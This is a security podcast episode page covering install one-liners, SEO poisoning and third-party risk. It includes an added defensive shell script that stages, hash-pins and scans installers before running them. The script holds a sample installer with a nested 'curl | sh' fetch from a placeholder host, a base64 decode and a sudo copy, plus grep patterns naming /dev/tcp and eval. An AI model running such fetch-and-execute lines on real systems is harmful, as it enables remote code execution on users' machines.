Paul's Security Weekly (Audio) Broadcom, LastPass, SEO Poisoning, QR codes, H1B visas, Distributed Computing... - PSW #893
Sep 25, 2025
Discover the latest in cybersecurity as the panel dives into Broadcom's strategies and LastPass vulnerabilities. They discuss the dangers of a GitHub impersonation campaign targeting Mac users. The importance of balancing user freedom with security is debated, alongside risks related to running unvetted scripts by developers. The dangers of QR codes and SEO poisoning are revealed, along with effective measures for managing third-party risk. Plus, find out how to protect your devices against theft and what to do if you lose your phone!
Restrict Running Unvetted Shell Commands
- Block or restrict users from running unvetted shell/PowerShell scripts pulled from the web, especially for non-developers.
- Treat GitHub-supplied curl/wget install one-liners (the `curl ... | sh` pattern in a README) with skepticism, and enforce review of the downloaded script before anything executes.
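The two points above describe a policy; the script below, added here as an illustration and not taken from the show or any project it mentions, shows what "review before execution" looks like in practice: stage the installer to disk instead of piping it into `sh`, pin its SHA-256, grep it for the constructs that should trigger a human read, and only execute a copy that is both pinned and clean. All function names, the flagged patterns, and the sample installer text are this example's own constructions; the sample stands in for what a real `curl -fsSL "$url"` would return.

```shell
#!/bin/sh
# Added example: stage -> pin -> review -> run, as a replacement for
# `curl -fsSL URL | sh`. Names and patterns here are illustrative assumptions.
set -u

# Constructed stand-in for a downloaded install.sh (not a real project's script).
SAMPLE_INSTALLER='#!/bin/sh
set -e
echo "installing example-tool..."
curl -fsSL https://example.invalid/stage2.sh | sh
echo aGVsbG8= | base64 -d > /tmp/example-tool
sudo cp /tmp/example-tool /usr/local/bin/
'

# Step 1: write the installer to a file instead of piping it straight into sh.
# In real use the body would be:  curl -fsSL "$url" -o "$staged"
stage_script() {
    printf '%s' "$SAMPLE_INSTALLER" > "$1"
}

# Step 2: hash the staged bytes so the reviewed copy can be pinned; a later
# re-download that hashes differently is refused.
script_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sum=$(sha256sum "$1")
    else
        sum=$(shasum -a 256 "$1")
    fi
    printf '%s\n' "${sum%% *}"
}

verify_pin() {   # verify_pin FILE EXPECTED_SHA256 -> exit 0 on match, 1 otherwise
    [ "$(script_sha256 "$1")" = "$2" ]
}

# Step 3: surface constructs that warrant a human read before execution.
# Prints each flagged line with its line number; the exit status is the number
# of pattern classes hit (0 = nothing flagged). The list is illustrative.
review_staged_script() {
    f="$1"; hits=0
    for re in \
        '(curl|wget)[^|]*\|[[:space:]]*(ba|z)?sh' \
        'base64[[:space:]]+(-d|-D|--decode)' \
        '(^|[[:space:]])sudo[[:space:]]' \
        '(^|[[:space:]])eval[[:space:]]' \
        '/dev/tcp/'; do
        if grep -nE "$re" "$f"; then
            hits=$((hits + 1))
        fi
    done
    return "$hits"
}

# Step 4: execute only a copy that matches the pin and passed review.
run_if_clean() {   # run_if_clean FILE EXPECTED_SHA256
    verify_pin "$1" "$2" || { echo "refusing $1: sha256 mismatch" >&2; return 1; }
    if ! review_staged_script "$1" >/dev/null; then
        echo "refusing $1: flagged lines need review before execution" >&2
        return 1
    fi
    sh "$1"
}

# Demo on the constructed sample: it is staged and pinned, then refused because
# it nests a pipe-to-shell, decodes base64 and escalates with sudo.
STAGED=$(mktemp)
trap 'rm -f "$STAGED"' EXIT
stage_script "$STAGED"
PIN=$(script_sha256 "$STAGED")
echo "staged $STAGED sha256=$PIN"
review_staged_script "$STAGED" || echo "flagged $? pattern class(es); not executing"
run_if_clean "$STAGED" "$PIN" || echo "blocked, as intended"
```

The grep patterns are deliberately crude: the goal is not to auto-approve scripts but to guarantee that a second-stage download, an encoded payload or a privilege escalation cannot slip past the person who typed the one-liner. Pinning the hash of the copy that was actually read is what makes the review meaningful on the next machine.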
Third Parties Create Hidden Highways
- Third-party integrations create deep, multi-hop access paths into your data and systems.
- The N-party problem (fourth/fifth parties) multiplies risk and hides who actually touches your data.
Invite Audits For Critical Vendors
- Require invited, auditable access (e.g., FedRAMP-style reviews) for critical third-party services.
- Insist on regular, signed disclosures or dashboards rather than trusting vendor questionnaires.